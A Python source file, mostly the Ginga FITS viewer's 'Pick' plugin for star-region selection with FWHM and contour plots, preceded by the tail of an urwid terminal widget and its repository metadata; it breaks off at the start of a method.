            # Fix: "except Exception, e" is Python-2-only syntax; the
            # "as e" form is valid on Python 2.6+ and Python 3.
            except Exception as e: #pylint: disable=broad-except
                self.output('Error: %s' %e)
                return
            if res == Terminal.Exit:
                raise urwid.ExitMainLoop()
            elif res:
                self.output(str(res))
        else:
            # No handler: just echo the line back.
            self.output(line)
    def output(self, line):
        """Write to the screen."""
        self.body.add(line)
        # Redraw explicitly when called from a non-UI thread.
        if self.eloop and self._eloop_thread != threading.current_thread():
            self.eloop.draw_screen()
    def _update_focus(self, focus):
        """Record whether the input line (True) or body (False) has focus."""
        self._focus = focus
    def switch_focus(self):
        """Toggle keyboard focus between the output body and the input line."""
        if self._focus:
            self.set_focus('body')
            self._focus = False
        else:
            self.set_focus_path(['footer', 1])
            self._focus = True
    def keypress(self, size, key):
        """Deal with tab to change between commandline and window."""
        if key == 'tab':
            self.switch_focus()
        return urwid.Frame.keypress(self, size, key)
|
phrawzty/ubunolia
|
turwidal/turwidal.py
|
Python
|
mpl-2.0
| 7,585
|
[
"exciting"
] |
52b74fcd6884c1fc46887e59c9240f1002a9a293519bb5153efd33dd36105942
|
#
# Pick.py -- Pick plugin for Ginga fits viewer
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import threading
import numpy
import time
import os.path
from ginga.misc import Widgets, CanvasTypes, Bunch
from ginga.util import iqcalc, wcs
from ginga import GingaPlugin
from ginga.util.six.moves import map, zip, filter
try:
from ginga.misc import Plot
have_mpl = True
except ImportError:
have_mpl = False
region_default_width = 30
region_default_height = 30
class Pick(GingaPlugin.LocalPlugin):
    def __init__(self, fv, fitsimage):
        """Set up per-channel Pick state and the interactive draw canvas.

        Parameters
        ----------
        fv : viewer shell object (provides logger, preferences, threads)
        fitsimage : the channel image viewer this plugin operates on
        """
        # superclass defines some variables for us, like logger
        super(Pick, self).__init__(fv, fitsimage)
        self.layertag = 'pick-canvas'
        self.pickimage = None      # zoomed view of the pick region
        self.pickcenter = None     # marker at the center of the pick image
        self.pick_qs = None        # last quality-stats result
        self.picktag = None        # canvas tag of the pick figure
        # get Pick preferences
        prefs = self.fv.get_preferences()
        self.settings = prefs.createCategory('plugin_Pick')
        self.settings.load(onError='silent')
        self.sync_preferences()
        self.pick_x1 = 0
        self.pick_y1 = 0
        self.pick_data = None
        self.pick_log = None
        self.dx = region_default_width
        self.dy = region_default_height
        # For offloading intensive calculation from graphics thread
        self.serialnum = 0
        self.lock = threading.RLock()
        self.lock2 = threading.RLock()
        self.ev_intr = threading.Event()
        self.last_rpt = {}
        self.plot_panx = 0.5
        self.plot_pany = 0.5
        self.plot_zoomlevel = 1.0
        self.contour_data = None
        self.iqcalc = iqcalc.IQCalc(self.logger)
        # Interactive canvas: user draws/edits a rectangle to define the
        # pick region; cursor events update/recompute it.
        self.dc = self.fv.getDrawClasses()
        canvas = self.dc.DrawingCanvas()
        canvas.enable_draw(True)
        canvas.enable_edit(True)
        canvas.set_callback('cursor-down', self.btndown)
        canvas.set_callback('cursor-move', self.drag)
        canvas.set_callback('cursor-up', self.update)
        canvas.set_drawtype('rectangle', color='cyan', linestyle='dash',
                            drawdims=True)
        canvas.set_callback('draw-event', self.draw_cb)
        canvas.set_callback('edit-event', self.edit_cb)
        canvas.setSurface(self.fitsimage)
        self.canvas = canvas
        self.have_mpl = have_mpl
    def sync_preferences(self):
        """Copy plugin settings into instance attributes, with defaults."""
        # Load various preferences
        self.pickcolor = self.settings.get('color_pick', 'green')
        self.candidate_color = self.settings.get('color_candidate', 'purple')
        # Peak finding parameters and selection criteria
        self.max_side = self.settings.get('max_side', 1024)
        self.radius = self.settings.get('radius', 10)
        self.threshold = self.settings.get('threshold', None)
        self.min_fwhm = self.settings.get('min_fwhm', 2.0)
        self.max_fwhm = self.settings.get('max_fwhm', 50.0)
        self.min_ellipse = self.settings.get('min_ellipse', 0.5)
        self.edgew = self.settings.get('edge_width', 0.01)
        self.show_candidates = self.settings.get('show_candidates', False)
        # Report in 0- or 1-based coordinates
        # (the viewer-level setting is the fallback for the plugin setting)
        coord_offset = self.fv.settings.get('pixel_coords_offset', 0.0)
        self.pixel_coords_offset = self.settings.get('pixel_coords_offset',
                                                     coord_offset)
        # For controls
        self.delta_sky = self.settings.get('delta_sky', 0.0)
        self.delta_bright = self.settings.get('delta_bright', 0.0)
        # Formatting for reports
        self.do_record = self.settings.get('record_picks', False)
        self.rpt_header = self.settings.get('report_header',
                                            "# ra, dec, eq, x, y, fwhm, fwhm_x, fwhm_y, starsize, ellip, bg, sky, bright, time_local, time_ut")
        self.rpt_format = self.settings.get('report_format',
                                            "%(ra_deg)f, %(dec_deg)f, %(equinox)6.1f, %(x)f, %(y)f, %(fwhm)f, %(fwhm_x)f, %(fwhm_y)f, %(starsize)f, %(ellipse)f, %(background)f, %(skylevel)f, %(brightness)f, %(time_local)s, %(time_ut)s")
        self.do_report_log = self.settings.get('report_to_log', False)
        report_log = self.settings.get('report_log_path', None)
        if report_log is None:
            report_log = "pick_log.txt"
        self.report_log = report_log
        # For contour plot
        self.num_contours = self.settings.get('num_contours', 8)
        self.contour_size_limit = self.settings.get('contour_size_limit', 70)
    def build_gui(self, container):
        """Construct the plugin GUI inside *container*.

        Layout: a splitter with the pick-image / Contour / FWHM tabs on
        top, a tabbed "Pick" panel (Readout, Settings, Controls, Report)
        below, and a Close button row at the bottom.
        """
        assert iqcalc.have_scipy == True, \
               Exception("Please install python-scipy to use this plugin")
        self.pickcenter = None
        vtop = Widgets.VBox()
        vtop.set_border_width(4)
        vbox, sw, orientation = Widgets.get_oriented_box(container)
        vbox.set_border_width(4)
        vbox.set_spacing(2)
        vpaned = Widgets.Splitter(orientation=orientation)
        nb = Widgets.TabWidget(tabpos='bottom')
        #nb.set_scrollable(True)
        self.w.nb1 = nb
        vpaned.add_widget(nb)
        cm, im = self.fv.cm, self.fv.im
        # Zoomed viewer for the pick region
        di = CanvasTypes.ImageViewCanvas(logger=self.logger)
        width, height = 200, 200
        di.set_desired_size(width, height)
        di.enable_autozoom('off')
        di.enable_autocuts('off')
        di.zoom_to(3, redraw=False)
        settings = di.get_settings()
        settings.getSetting('zoomlevel').add_callback('set',
                                                      self.zoomset, di)
        di.set_cmap(cm, redraw=False)
        di.set_imap(im, redraw=False)
        di.set_callback('none-move', self.detailxy)
        di.set_bg(0.4, 0.4, 0.4)
        # for debugging
        di.set_name('pickimage')
        self.pickimage = di
        bd = di.get_bindings()
        bd.enable_pan(True)
        bd.enable_zoom(True)
        bd.enable_cuts(True)
        iw = Widgets.wrap(di.get_widget())
        nb.add_widget(iw, title="Image")
        if have_mpl:
            # Contour plot tab
            self.plot1 = Plot.Plot(logger=self.logger,
                                   width=2, height=3, dpi=72)
            self.w.canvas = self.plot1.canvas
            self.w.fig = self.plot1.fig
            self.w.ax = self.w.fig.add_subplot(111, axisbg='black')
            self.w.ax.set_aspect('equal', adjustable='box')
            self.w.ax.set_title('Contours')
            #self.w.ax.grid(True)
            canvas = self.w.canvas
            connect = canvas.mpl_connect
            # These are not ready for prime time...
            # connect("motion_notify_event", self.plot_motion_notify)
            # connect("button_press_event", self.plot_button_press)
            connect("scroll_event", self.plot_scroll)
            nb.add_widget(Widgets.wrap(canvas), title="Contour")
            # FWHM plot tab
            self.plot2 = Plot.Plot(logger=self.logger,
                                   width=2, height=3, dpi=72)
            self.w.canvas2 = self.plot2.canvas
            self.w.fig2 = self.plot2.fig
            self.w.ax2 = self.w.fig2.add_subplot(111, axisbg='white')
            #self.w.ax2.set_aspect('equal', adjustable='box')
            self.w.ax2.set_ylabel('brightness')
            self.w.ax2.set_xlabel('pixels')
            self.w.ax2.set_title('FWHM')
            # NOTE(review): this grids 'ax' (the contour axes), not 'ax2'
            # (the FWHM axes just configured) -- possibly a typo; confirm.
            self.w.ax.grid(True)
            canvas = self.w.canvas2
            nb.add_widget(Widgets.wrap(canvas), title="FWHM")
        ## self.msgFont = self.fv.getFont("sansFont", 12)
        ## tw = Widgets.TextArea(wrap=True, editable=False)
        ## tw.set_font(self.msgFont)
        ## self.tw = tw
        ## fr = Widgets.Frame("Instructions")
        ## vbox2 = Widgets.VBox()
        ## vbox2.add_widget(tw)
        ## vbox2.add_widget(Widgets.Label(''), stretch=1)
        ## fr.set_widget(vbox2)
        ## vbox.add_widget(fr, stretch=0)
        vpaned.add_widget(Widgets.Label(''))
        vbox.add_widget(vpaned, stretch=1)
        fr = Widgets.Frame("Pick")
        nb = Widgets.TabWidget(tabpos='bottom')
        self.w.nb2 = nb
        # Build report panel
        captions = (('Zoom:', 'label', 'Zoom', 'llabel',
                     'Contour Zoom:', 'label', 'Contour Zoom', 'llabel'),
                    ('Object_X', 'label', 'Object_X', 'llabel',
                     'Object_Y', 'label', 'Object_Y', 'llabel'),
                    ('RA:', 'label', 'RA', 'llabel',
                     'DEC:', 'label', 'DEC', 'llabel'),
                    ('Equinox:', 'label', 'Equinox', 'llabel',
                     'Background:', 'label', 'Background', 'llabel'),
                    ('Sky Level:', 'label', 'Sky Level', 'llabel',
                     'Brightness:', 'label', 'Brightness', 'llabel'),
                    ('FWHM X:', 'label', 'FWHM X', 'llabel',
                     'FWHM Y:', 'label', 'FWHM Y', 'llabel'),
                    ('FWHM:', 'label', 'FWHM', 'llabel',
                     'Star Size:', 'label', 'Star Size', 'llabel'),
                    ('Sample Area:', 'label', 'Sample Area', 'llabel',
                     'Default Region', 'button'),
                    ('Pan to pick', 'button'),
                    )
        w, b = Widgets.build_info(captions, orientation=orientation)
        self.w.update(b)
        b.zoom.set_text(self.fv.scale2text(di.get_scale()))
        self.wdetail = b
        b.default_region.add_callback('activated',
                                      lambda w: self.reset_region())
        b.default_region.set_tooltip("Reset region size to default")
        b.pan_to_pick.add_callback('activated',
                                   lambda w: self.pan_to_pick_cb())
        b.pan_to_pick.set_tooltip("Pan image to pick center")
        vbox1 = Widgets.VBox()
        vbox1.add_widget(w, stretch=0)
        # spacer
        vbox1.add_widget(Widgets.Label(''), stretch=0)
        # Pick field evaluation status
        hbox = Widgets.HBox()
        hbox.set_spacing(4)
        hbox.set_border_width(4)
        label = Widgets.Label()
        #label.set_alignment(0.05, 0.5)
        self.w.eval_status = label
        hbox.add_widget(self.w.eval_status, stretch=0)
        hbox.add_widget(Widgets.Label(''), stretch=1)
        vbox1.add_widget(hbox, stretch=0)
        # Pick field evaluation progress bar and stop button
        hbox = Widgets.HBox()
        hbox.set_spacing(4)
        hbox.set_border_width(4)
        btn = Widgets.Button("Stop")
        btn.add_callback('activated', lambda w: self.eval_intr())
        btn.set_enabled(False)
        self.w.btn_intr_eval = btn
        hbox.add_widget(btn, stretch=0)
        self.w.eval_pgs = Widgets.ProgressBar()
        hbox.add_widget(self.w.eval_pgs, stretch=1)
        vbox1.add_widget(hbox, stretch=0)
        nb.add_widget(vbox1, title="Readout")
        # Build settings panel
        captions = (('Show Candidates', 'checkbutton'),
                    ('Radius:', 'label', 'xlbl_radius', 'label',
                     'Radius', 'spinbutton'),
                    ('Threshold:', 'label', 'xlbl_threshold', 'label',
                     'Threshold', 'entry'),
                    ('Min FWHM:', 'label', 'xlbl_min_fwhm', 'label',
                     'Min FWHM', 'spinbutton'),
                    ('Max FWHM:', 'label', 'xlbl_max_fwhm', 'label',
                     'Max FWHM', 'spinbutton'),
                    ('Ellipticity:', 'label', 'xlbl_ellipticity', 'label',
                     'Ellipticity', 'entry'),
                    ('Edge:', 'label', 'xlbl_edge', 'label',
                     'Edge', 'entry'),
                    ('Max side:', 'label', 'xlbl_max_side', 'label',
                     'Max side', 'spinbutton'),
                    ('Coordinate Base:', 'label',
                     'xlbl_coordinate_base', 'label',
                     'Coordinate Base', 'entry'),
                    ('Redo Pick', 'button'),
                    )
        w, b = Widgets.build_info(captions, orientation=orientation)
        self.w.update(b)
        b.radius.set_tooltip("Radius for peak detection")
        b.threshold.set_tooltip("Threshold for peak detection (blank=default)")
        b.min_fwhm.set_tooltip("Minimum FWHM for selection")
        b.max_fwhm.set_tooltip("Maximum FWHM for selection")
        b.ellipticity.set_tooltip("Minimum ellipticity for selection")
        b.edge.set_tooltip("Minimum edge distance for selection")
        b.show_candidates.set_tooltip("Show all peak candidates")
        b.coordinate_base.set_tooltip("Base of pixel coordinate system")
        # radius control
        #b.radius.set_digits(2)
        #b.radius.set_numeric(True)
        b.radius.set_limits(5.0, 200.0, incr_value=1.0)
        def chg_radius(w, val):
            # keep the live label next to the control in sync
            self.radius = float(val)
            self.w.xlbl_radius.set_text(str(self.radius))
            return True
        b.xlbl_radius.set_text(str(self.radius))
        b.radius.add_callback('value-changed', chg_radius)
        # threshold control
        def chg_threshold(w):
            # empty entry means "use the default" (None)
            threshold = None
            ths = w.get_text().strip()
            if len(ths) > 0:
                threshold = float(ths)
            self.threshold = threshold
            self.w.xlbl_threshold.set_text(str(self.threshold))
            return True
        b.xlbl_threshold.set_text(str(self.threshold))
        b.threshold.add_callback('activated', chg_threshold)
        # min fwhm
        #b.min_fwhm.set_digits(2)
        #b.min_fwhm.set_numeric(True)
        b.min_fwhm.set_limits(0.1, 200.0, incr_value=0.1)
        b.min_fwhm.set_value(self.min_fwhm)
        def chg_min(w, val):
            self.min_fwhm = float(val)
            self.w.xlbl_min_fwhm.set_text(str(self.min_fwhm))
            return True
        b.xlbl_min_fwhm.set_text(str(self.min_fwhm))
        b.min_fwhm.add_callback('value-changed', chg_min)
        # max fwhm
        #b.max_fwhm.set_digits(2)
        #b.max_fwhm.set_numeric(True)
        b.max_fwhm.set_limits(0.1, 200.0, incr_value=0.1)
        b.max_fwhm.set_value(self.max_fwhm)
        def chg_max(w, val):
            self.max_fwhm = float(val)
            self.w.xlbl_max_fwhm.set_text(str(self.max_fwhm))
            return True
        b.xlbl_max_fwhm.set_text(str(self.max_fwhm))
        b.max_fwhm.add_callback('value-changed', chg_max)
        # Ellipticity control
        def chg_ellipticity(w):
            minellipse = None
            val = w.get_text().strip()
            if len(val) > 0:
                minellipse = float(val)
            self.min_ellipse = minellipse
            self.w.xlbl_ellipticity.set_text(str(self.min_ellipse))
            return True
        b.xlbl_ellipticity.set_text(str(self.min_ellipse))
        b.ellipticity.add_callback('activated', chg_ellipticity)
        # Edge control
        def chg_edgew(w):
            edgew = None
            val = w.get_text().strip()
            if len(val) > 0:
                edgew = float(val)
            self.edgew = edgew
            self.w.xlbl_edge.set_text(str(self.edgew))
            return True
        b.xlbl_edge.set_text(str(self.edgew))
        b.edge.add_callback('activated', chg_edgew)
        #b.max_side.set_digits(0)
        #b.max_side.set_numeric(True)
        b.max_side.set_limits(5, 10000, incr_value=10)
        b.max_side.set_value(self.max_side)
        def chg_max_side(w, val):
            self.max_side = int(val)
            self.w.xlbl_max_side.set_text(str(self.max_side))
            return True
        b.xlbl_max_side.set_text(str(self.max_side))
        b.max_side.add_callback('value-changed', chg_max_side)
        b.redo_pick.add_callback('activated', lambda w: self.redo())
        b.show_candidates.set_state(self.show_candidates)
        b.show_candidates.add_callback('activated', self.show_candidates_cb)
        self.w.xlbl_coordinate_base.set_text(str(self.pixel_coords_offset))
        b.coordinate_base.set_text(str(self.pixel_coords_offset))
        b.coordinate_base.add_callback('activated', self.coordinate_base_cb)
        nb.add_widget(w, title="Settings")
        # Build controls panel
        vbox3 = Widgets.VBox()
        captions = (
            ('Sky cut', 'button', 'Delta sky:', 'label',
             'xlbl_delta_sky', 'label', 'Delta sky', 'entry'),
            ('Bright cut', 'button', 'Delta bright:', 'label',
             'xlbl_delta_bright', 'label', 'Delta bright', 'entry'),
            )
        w, b = Widgets.build_info(captions, orientation=orientation)
        self.w.update(b)
        b.sky_cut.set_tooltip("Set image low cut to Sky Level")
        b.delta_sky.set_tooltip("Delta to apply to low cut")
        b.bright_cut.set_tooltip("Set image high cut to Sky Level+Brightness")
        b.delta_bright.set_tooltip("Delta to apply to high cut")
        b.sky_cut.set_enabled(False)
        self.w.btn_sky_cut = b.sky_cut
        self.w.btn_sky_cut.add_callback('activated', lambda w: self.sky_cut())
        self.w.sky_cut_delta = b.delta_sky
        b.xlbl_delta_sky.set_text(str(self.delta_sky))
        b.delta_sky.set_text(str(self.delta_sky))
        def chg_delta_sky(w):
            delta_sky = 0.0
            val = w.get_text().strip()
            if len(val) > 0:
                delta_sky = float(val)
            self.delta_sky = delta_sky
            self.w.xlbl_delta_sky.set_text(str(self.delta_sky))
            return True
        b.delta_sky.add_callback('activated', chg_delta_sky)
        b.bright_cut.set_enabled(False)
        self.w.btn_bright_cut = b.bright_cut
        self.w.btn_bright_cut.add_callback('activated',
                                           lambda w: self.bright_cut())
        self.w.bright_cut_delta = b.delta_bright
        b.xlbl_delta_bright.set_text(str(self.delta_bright))
        b.delta_bright.set_text(str(self.delta_bright))
        def chg_delta_bright(w):
            delta_bright = 0.0
            val = w.get_text().strip()
            if len(val) > 0:
                delta_bright = float(val)
            self.delta_bright = delta_bright
            self.w.xlbl_delta_bright.set_text(str(self.delta_bright))
            return True
        b.delta_bright.add_callback('activated', chg_delta_bright)
        vbox3.add_widget(w, stretch=0)
        vbox3.add_widget(Widgets.Label(''), stretch=1)
        nb.add_widget(vbox3, title="Controls")
        # Build report panel
        vbox3 = Widgets.VBox()
        msgFont = self.fv.getFont("fixedFont", 10)
        tw = Widgets.TextArea(wrap=False, editable=True)
        tw.set_font(msgFont)
        self.w.report = tw
        sw1 = Widgets.ScrollArea()
        sw1.set_widget(tw)
        vbox3.add_widget(sw1, stretch=1)
        tw.append_text(self._make_report_header())
        btns = Widgets.HBox()
        btns.set_spacing(4)
        btn = Widgets.Button("Add Pick")
        btn.add_callback('activated', lambda w: self.add_pick_cb())
        btns.add_widget(btn)
        btn = Widgets.CheckBox("Record Picks automatically")
        btn.set_state(self.do_record)
        btn.add_callback('activated', self.record_cb)
        btns.add_widget(btn)
        btns.add_widget(Widgets.Label(''), stretch=1)
        vbox3.add_widget(btns, stretch=0)
        btns = Widgets.HBox()
        btns.set_spacing(4)
        btn = Widgets.CheckBox("Log Records")
        btn.set_state(self.do_report_log)
        btn.add_callback('activated', self.do_report_log_cb)
        btns.add_widget(btn)
        btns.add_widget(Widgets.Label("File:"))
        ent = Widgets.TextEntry()
        ent.set_length(512)
        ent.set_text(self.report_log)
        ent.add_callback('activated', self.set_report_log_cb)
        btns.add_widget(ent, stretch=1)
        vbox3.add_widget(btns, stretch=0)
        nb.add_widget(vbox3, title="Report")
        ## vbox4 = Widgets.VBox()
        ## tw = Widgets.TextArea(wrap=False, editable=True)
        ## tw.set_font(msgFont)
        ## self.w.correct = tw
        ## sw1 = Widgets.ScrollArea()
        ## sw1.set_widget(tw)
        ## vbox4.add_widget(sw1, stretch=1)
        ## tw.append_text("# paste a reference report here")
        ## btns = Widgets.HBox()
        ## btns.set_spacing(4)
        ## btn = Widgets.Button("Correct WCS")
        ## btn.add_callback('activated', lambda w: self.correct_wcs())
        ## btns.add_widget(btn)
        ## vbox4.add_widget(btns, stretch=0)
        ## nb.add_widget(vbox4, title="Correct")
        fr.set_widget(nb)
        vbox.add_widget(fr, stretch=0)
        ## spacer = Widgets.Label('')
        ## vbox.add_widget(spacer, stretch=1)
        vtop.add_widget(sw, stretch=1)
        btns = Widgets.HBox()
        btns.set_spacing(4)
        btn = Widgets.Button("Close")
        btn.add_callback('activated', lambda w: self.close())
        btns.add_widget(btn)
        btns.add_widget(Widgets.Label(''), stretch=1)
        vtop.add_widget(btns, stretch=0)
        container.add_widget(vtop, stretch=1)
    def copyText(self, w):
        """Copy the widget's text to the clipboard (not yet implemented)."""
        text = w.get_text()
        # TODO: put it in the clipboard
    def record_cb(self, w, tf):
        """Checkbox callback: toggle automatic recording of picks."""
        self.do_record = tf
        return True
def do_report_log_cb(self, w, tf):
self.do_report_log = tf
if tf and (self.pick_log is None):
self.open_report_log()
return True
def set_report_log_cb(self, w):
self.close_report_log()
report_log = w.get_text().strip()
if len(report_log) == 0:
report_log = "pick_log.txt"
w.set_text(report_log)
self.report_log = report_log
self.open_report_log()
return True
## def instructions(self):
## self.tw.set_text("""Left-click to place region. Left-drag to position region. Redraw region with the right mouse button.""")
## self.tw.set_font(self.msgFont)
    def update_status(self, text):
        """Show *text* in the status label (marshalled to the GUI thread)."""
        self.fv.gui_do(self.w.eval_status.set_text, text)
    def init_progress(self):
        """Reset the progress bar and arm the Stop button for a new run."""
        self.w.btn_intr_eval.set_enabled(True)
        self.w.eval_pgs.set_value(0.0)
    def update_progress(self, pct):
        """Set the evaluation progress bar to *pct* (fraction 0.0-1.0)."""
        self.w.eval_pgs.set_value(pct)
def show_candidates_cb(self, w, state):
self.show_candidates = state
if not self.show_candidates:
# Delete previous peak marks
objs = self.fitsimage.getObjectsByTagpfx('peak')
self.fitsimage.deleteObjects(objs, redraw=True)
def coordinate_base_cb(self, w):
self.pixel_coords_offset = float(w.get_text())
self.w.xlbl_coordinate_base.set_text(str(self.pixel_coords_offset))
    def adjust_wcs(self, image, wcs_m, tup):
        """Show a confirmation dialog for a computed WCS shift/rotation.

        *tup* is (d_ra, d_dec, d_theta) with the offsets in arcsec and
        the rotation in degrees.

        NOTE(review): ``GtkHelp`` and ``gtk`` are not in this module's
        visible import block -- this looks like Gtk-backend-only legacy
        code and would raise NameError if invoked here; confirm.
        """
        d_ra, d_dec, d_theta = tup
        msg = "Calculated shift: dra, ddec = %f, %f\n" % (
            d_ra/3600.0, d_dec/3600.0)
        msg += "Calculated rotation: %f deg\n" % (d_theta)
        msg += "\nAdjust WCS?"
        dialog = GtkHelp.Dialog("Adjust WCS",
                                gtk.DIALOG_DESTROY_WITH_PARENT,
                                [['Cancel', 0], ['Ok', 1]],
                                lambda w, rsp: self.adjust_wcs_cb(w, rsp,
                                                                  image, wcs_m))
        box = dialog.get_content_area()
        w = gtk.Label(msg)
        box.pack_start(w, expand=True, fill=True)
        dialog.show_all()
def adjust_wcs_cb(self, w, rsp, image, wcs_m):
w.destroy()
if rsp == 0:
return
#image.wcs = wcs_m.wcs
image.update_keywords(wcs_m.hdr)
return True
def plot_scroll(self, event):
# Matplotlib only gives us the number of steps of the scroll,
# positive for up and negative for down.
direction = None
if event.step > 0:
#delta = 0.9
self.plot_zoomlevel += 1.0
elif event.step < 0:
#delta = 1.1
self.plot_zoomlevel -= 1.0
self.plot_panzoom()
# x1, x2 = self.w.ax.get_xlim()
# y1, y2 = self.w.ax.get_ylim()
# self.w.ax.set_xlim(x1*delta, x2*delta)
# self.w.ax.set_ylim(y1*delta, y2*delta)
# self.w.canvas.draw()
def plot_button_press(self, event):
if event.button == 1:
self.plot_x, self.plot_y = event.x, event.y
return True
def plot_motion_notify(self, event):
if event.button == 1:
xdelta = event.x - self.plot_x
#ydelta = event.y - self.plot_y
ydelta = self.plot_y - event.y
self.pan_plot(xdelta, ydelta)
def bump_serial(self):
with self.lock:
self.serialnum += 1
return self.serialnum
def get_serial(self):
with self.lock:
return self.serialnum
    def plot_panzoom(self):
        """Apply the current pan fraction and zoom level to the contour axes.

        plot_panx/plot_pany are fractions (0-1) of the contour data's
        width/height; plot_zoomlevel >= 1 zooms in, <= -1 zooms out.
        """
        ht, wd = self.contour_data.shape
        x = int(self.plot_panx * wd)
        y = int(self.plot_pany * ht)
        if self.plot_zoomlevel >= 1.0:
            scalefactor = 1.0 / self.plot_zoomlevel
        elif self.plot_zoomlevel < -1.0:
            scalefactor = - self.plot_zoomlevel
        else:
            # wierd condition?--reset to 1:1
            scalefactor = 1.0
            self.plot_zoomlevel = 1.0
        # Show contour zoom level
        text = self.fv.scale2text(1.0/scalefactor)
        self.wdetail.contour_zoom.set_text(text)
        # Window of +/- scalefactor * half-size around (x, y), clamped to
        # the data bounds with the overflow pushed to the opposite side.
        xdelta = int(scalefactor * (wd/2.0))
        ydelta = int(scalefactor * (ht/2.0))
        xlo, xhi = x-xdelta, x+xdelta
        # distribute remaining x space from plot
        if xlo < 0:
            xsh = abs(xlo)
            xlo, xhi = 0, min(wd-1, xhi+xsh)
        elif xhi >= wd:
            xsh = xhi - wd
            xlo, xhi = max(0, xlo-xsh), wd-1
        self.w.ax.set_xlim(xlo, xhi)
        ylo, yhi = y-ydelta, y+ydelta
        # distribute remaining y space from plot
        if ylo < 0:
            ysh = abs(ylo)
            ylo, yhi = 0, min(ht-1, yhi+ysh)
        elif yhi >= ht:
            ysh = yhi - ht
            ylo, yhi = max(0, ylo-ysh), ht-1
        self.w.ax.set_ylim(ylo, yhi)
        self.w.fig.canvas.draw()
    def plot_contours(self):
        """Draw a contour plot of the pick region, centered on the object."""
        # Make a contour plot
        ht, wd = self.pick_data.shape
        # If size of pick region is too large, carve out a subset around
        # the picked object coordinates for plotting contours
        maxsize = max(ht, wd)
        if maxsize > self.contour_size_limit:
            image = self.fitsimage.get_image()
            radius = int(self.contour_size_limit // 2)
            x, y = self.pick_qs.x, self.pick_qs.y
            data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
            # translate the object position into the cutout's coordinates
            x, y = x - x1, y - y1
            ht, wd = data.shape
        else:
            data = self.pick_data
            x, y = self.pickcenter.x, self.pickcenter.y
        self.contour_data = data
        # Set pan position in contour plot
        self.plot_panx = float(x) / wd
        self.plot_pany = float(y) / ht
        self.w.ax.cla()
        try:
            # Create a contour plot
            xarr = numpy.arange(wd)
            yarr = numpy.arange(ht)
            self.w.ax.contourf(xarr, yarr, data, self.num_contours)
            # Mark the center of the object
            self.w.ax.plot([x], [y], marker='x', ms=20.0,
                           color='black')
            # Set the pan and zoom position & redraw
            self.plot_panzoom()
        except Exception as e:
            self.logger.error("Error making contour plot: %s" % (
                str(e)))
    def clear_contours(self):
        """Erase the contour plot axes."""
        self.w.ax.cla()
    def _plot_fwhm_axis(self, arr, skybg, color1, color2, color3):
        """Plot one cross-section (data + gaussian fit) on the FWHM axes.

        Returns the (fwhm, mu, sdev, maxv) of the fit to *arr*.
        *color2* is currently unused by the plotting calls below.
        """
        N = len(arr)
        X = numpy.array(list(range(N)))
        Y = arr
        # subtract sky background
        ## skybg = numpy.median(Y)
        Y = Y - skybg
        maxv = Y.max()
        # clamp to 0..max
        Y = Y.clip(0, maxv)
        self.logger.debug("Y=%s" % (str(Y)))
        self.w.ax2.plot(X, Y, color=color1, marker='.')
        # fit is computed on the raw (un-subtracted) array
        fwhm, mu, sdev, maxv = self.iqcalc.calc_fwhm(arr)
        Z = numpy.array([self.iqcalc.gaussian(x, (mu, sdev, maxv)) for x in X])
        self.w.ax2.plot(X, Z, color=color1, linestyle=':')
        # shade the FWHM span around the fitted center
        self.w.ax2.axvspan(mu-fwhm/2.0, mu+fwhm/2.0,
                           facecolor=color3, alpha=0.25)
        return (fwhm, mu, sdev, maxv)
    def plot_fwhm(self, qs):
        """Plot X and Y cross-sections through pick *qs* with FWHM fits."""
        # Make a FWHM plot
        self.w.ax2.cla()
        x, y, radius = qs.x, qs.y, qs.fwhm_radius
        try:
            image = self.fitsimage.get_image()
            x0, y0, xarr, yarr = image.cutout_cross(x, y, radius)
            # get median value from the cutout area
            skybg = numpy.median(self.pick_data)
            self.logger.debug("cutting x=%d y=%d r=%d med=%f" % (
                x, y, radius, skybg))
            self.logger.debug("xarr=%s" % (str(xarr)))
            fwhm_x, mu, sdev, maxv = self._plot_fwhm_axis(xarr, skybg,
                                                          'blue', 'blue', 'skyblue')
            self.logger.debug("yarr=%s" % (str(yarr)))
            fwhm_y, mu, sdev, maxv = self._plot_fwhm_axis(yarr, skybg,
                                                          'green', 'green', 'seagreen')
            plt = self.w.ax2
            plt.legend(('data x', 'gauss x', 'data y', 'gauss y'),
                       'upper right', shadow=False, fancybox=False,
                       prop={'size': 8}, labelspacing=0.2)
            plt.set_title("FWHM X: %.2f Y: %.2f" % (fwhm_x, fwhm_y))
            self.w.fig2.canvas.draw()
        except Exception as e:
            self.logger.error("Error making fwhm plot: %s" % (
                str(e)))
    def clear_fwhm(self):
        """Erase the FWHM plot axes."""
        self.w.ax2.cla()
def open_report_log(self):
# Open report log if user specified one
if self.do_report_log and (self.report_log is not None) and \
(self.pick_log is None):
try:
file_exists = os.path.exists(self.report_log)
self.pick_log = open(self.report_log, 'a')
if not file_exists:
self.pick_log.write(self.rpt_header + '\n')
self.logger.info("Opened Pick log '%s'" % (self.report_log))
except IOError as e:
self.logger.error("Error opening Pick log (%s): %s" % (
self.report_log, str(e)))
def close_report_log(self):
if self.pick_log is not None:
try:
self.pick_log.close()
self.logger.info("Closed Pick log '%s'" % (self.report_log))
except IOError as e:
self.logger.error("Error closing Pick log (%s): %s" % (
self.report_log, str(e)))
finally:
self.pick_log = None
    def close(self):
        """Ask the viewer shell to stop this plugin for its channel."""
        chname = self.fv.get_channelName(self.fitsimage)
        self.fv.stop_local_plugin(chname, str(self))
        return True
    def start(self):
        """Begin operation: open the log and install our canvas layer."""
        #self.instructions()
        self.open_report_log()
        # insert layer if it is not already
        try:
            obj = self.fitsimage.getObjectByTag(self.layertag)
        except KeyError:
            # Add canvas layer
            self.fitsimage.add(self.canvas, tag=self.layertag)
        self.resume()
    def pause(self):
        """Suspend UI interaction on our canvas."""
        self.canvas.ui_setActive(False)
    def resume(self):
        """Re-enable UI interaction on our canvas and prompt the user."""
        # turn off any mode user may be in
        self.modes_off()
        self.canvas.ui_setActive(True)
        self.fv.showStatus("Draw a rectangle with the right mouse button")
def stop(self):
# Delete previous peak marks
objs = self.fitsimage.getObjectsByTagpfx('peak')
self.fitsimage.deleteObjects(objs, redraw=False)
# close pick log, if any
self.close_report_log()
# deactivate the canvas
self.canvas.ui_setActive(False)
try:
self.fitsimage.deleteObjectByTag(self.layertag)
except:
pass
self.fv.showStatus("")
    def redo(self):
